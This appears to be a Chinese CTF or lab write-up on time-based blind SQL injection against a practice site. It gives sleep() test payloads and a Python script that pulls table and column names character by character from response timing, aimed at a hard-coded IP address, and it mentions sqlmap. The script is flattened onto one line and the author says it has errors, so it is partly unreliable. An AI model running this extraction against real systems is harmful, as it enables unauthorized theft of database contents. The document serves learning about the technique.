Sql时间盲注
1、 开始的页面,但是不是这个页面,点击下面的任性网页
2、提示再url中传参,加个逗号 ?type=1’
既然提示是时间盲注,那就
?type=1’ and sleep(5)%23
没有时间延迟
去掉单引号
有时间延迟5秒
因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap
这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段
import requests import datetime import time session = requests.Session() session.keep_alive = False # requests默认使用urllib3库,默认是长连接,改为false,关闭多余的连接 requests.adapters.DEFAULT_RETRIES = 8 # 设置重连次数,防止线程数过高,断开连接 def lenStr(name): for i in range(100): url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(length("+str(name)+")="+str(i)+",sleep(2),1)" time1 = datetime.datetime.now() print(url+payload+'%23') r = session.get(url+payload+'%23') time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: print(str(name)+" len is %d" % i) return i global database_name def database(): name = 'database()' lenDB = lenStr(name) database_name = '' for i in range(1, lenDB+1): for j in '0123456789abcdefghijklmnopqrstuvwxyz': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr(database(),%d,1)='%s',sleep(2),1)" % (i, j) print(url+payload+"%23") time1 = datetime.datetime.now() r = session.get(url=url+payload+'%23') time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: database_name += j print("database:"+database_name) break def table(): global table_name table_name = '' name = "(select group_concat(table_name) from information_schema.tables where table_schema=database())" lenTB = lenStr(name) for i in range(lenTB+1): for j in '0123456789abcdefghijklmnopqrstuvwxyz,./`?<>-_=+~!@#$%^&*()': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr("+name+","+str(i)+",1)='"+j+"',sleep(2),1)" print(url+payload+"%23") time1 = datetime.datetime.now() r = session.get(url+payload+"%23") time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: table_name += j print("table:"+table_name) break def column(): global column_name column_name = '' list = table_name.split(",", -1) for TB in list: name = "(select group_concat(column_name) from information_schema.columns where table_name='"+TB+"')" lenCL = lenStr(name) for i in range(lenCL): for j in '0123456789abcdefghijklmnopqrstuvwxyz,./`?<>-_=+~!@#$%^&*()': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr("+name+","+str(i)+",1)='"+j+"',sleep(2),1)" print(url + payload + "%23") time1 = datetime.datetime.now() r = session.get(url + payload + "%23") time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: column_name += j print("table:"+TB+"ncolumn:"+column_name) break if __name__ == '__main__': #database() table() column()
还是用sqlmap扫把
爆数据库
爆表
爆字段
爆值
回到第一个页面
技术重点:时间盲注无回显,只能靠sleep判断。
手工注入:需猜表名等等,比较麻烦。考验基础。